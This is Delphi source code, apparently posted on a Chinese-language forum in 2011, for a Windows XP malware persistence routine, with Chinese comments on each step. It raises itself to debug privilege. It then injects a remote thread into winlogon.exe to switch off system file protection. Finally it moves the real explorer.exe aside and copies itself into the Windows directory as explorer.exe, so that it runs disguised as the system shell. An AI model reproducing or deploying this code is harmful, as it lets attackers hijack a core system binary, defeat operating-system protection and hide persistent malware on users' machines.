|
|
- program Project1;
- uses
- Windows, TlHelp32;
- function LowerCase(const S: string): string; //转小写
- var
- Ch: Char;
- L: Integer;
- Source, Dest: PChar;
- begin
- L := Length(S);
- SetLength(Result, L);
- Source := Pointer(S);
- Dest := Pointer(Result);
- while L <> 0 do
- begin
- Ch := Source^;
- if (Ch >= ' A' ) and (Ch <= ' Z' ) then Inc(Ch, 32);
- Dest^ := Ch;
- Inc(Source);
- Inc(Dest);
- Dec(L);
- end;
- end;
- function CreatedMutexEx(MutexName: Pchar): Boolean;
- var
- MutexHandle: dword;
- begin
- MutexHandle := CreateMutex(nil, True, MutexName);
- if MutexHandle <> 0 then
- begin
- if GetLastError = ERROR_ALREADY_EXISTS then
- begin
- //CloseHandle(MutexHandle);
- Result := False;
- Exit;
- end;
- end;
- Result := True;
- end;
- function GetWinPath: string; //取WINDOWS目录
- var
- Buf: array[0..MAX_PATH] of char;
- begin
- GetWindowsDirectory(Buf, MAX_PATH);
- Result := Buf;
- if Result[Length(Result)] <> ' \' then Result := Result + ' \' ;
- end;
- function GetTempDirectory: string; //取临时目录
- var
- Buf: array[0..MAX_PATH] of char;
- begin
- GetTempPath(MAX_PATH, Buf);
- Result := Buf;
- if Result[Length(Result)] <> ' \' then Result := Result + ' \' ;
- end;
- function EnableDebugPriv: Boolean; //提权为DEBUG
- var
- hToken: THANDLE;
- tp: TTokenPrivileges;
- rl: Cardinal;
- begin
- result := false;
- OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
- if LookupPrivilegeValue(nil, ' SeDebugPrivilege' , tp.Privileges[0].Luid) then
- begin
- tp.PrivilegeCount := 1;
- tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
- result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
- end;
- end;
- procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 关闭XP文件保护
- var
- TID: LongWord;
- hSfc, hThread: HMODULE;
- pfnCloseEvents: Pointer;
- begin
- hSfc := LoadLibrary(' sfc_os.dll' );
- pfnCloseEvents := GetProcAddress(hSfc, MAKEINTRESOURCE(2));
- FreeLibrary(hSfc);
- hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
- WaitForSingleObject(hThread, 4000);
- end;
- procedure InitProcess(Name: string); //查找winlogon.exe进程PID
- var
- FSnapshotHandle: THandle;
- FProcessEntry32: TProcessEntry32;
- ProcessHandle: dword;
- begin
- FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
- if Process32First(FSnapshotHandle, FProcessEntry32) then begin
- repeat
- if Name = LowerCase(FProcessEntry32.szExeFile) then
- begin
- ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
- InjectThread(ProcessHandle);
- CloseHandle(ProcessHandle);
- Break;
- end;
- until not Process32Next(FSnapshotHandle, FProcessEntry32);
- end;
- CloseHandle(FSnapshotHandle);
- end;
- const ExpFile = ' explorer.exe' ;
- MasterMutex = ' OpenSoul' ;
- var
- s: string;
- begin
- if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体
- if not EnableDebugPriv then Exit; //提权失败退出
- InitProcess(' winlogon.exe' ); //注入winlogon.exe 先关闭xp的文件保护 .预防系统的还原
- s := ParamStr(0); //取本名
- if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //判断自己是不是系统下的explorer.exe
- begin //如果不是
- MoveFileEx(PChar(GetWinPath + ExpFile), PChar(GetWinPath + ' system32\explorer.exe' ), MOVEFILE_REPLACE_EXISTING); //先移动正在运行的explorer.exe
- CopyFile(PChar(S), PChar(GetWinPath + ExpFile), false); //把自己复制到windows目录 为explorer.exe
- end;
- WinExec(PChar(GetWinPath + ' system32\explorer.exe' ), 1); //运行真正的explorer.exe
- end.
|
|
发表于 2011-8-6 08:25:27
发表于 2011-11-12 15:52:03
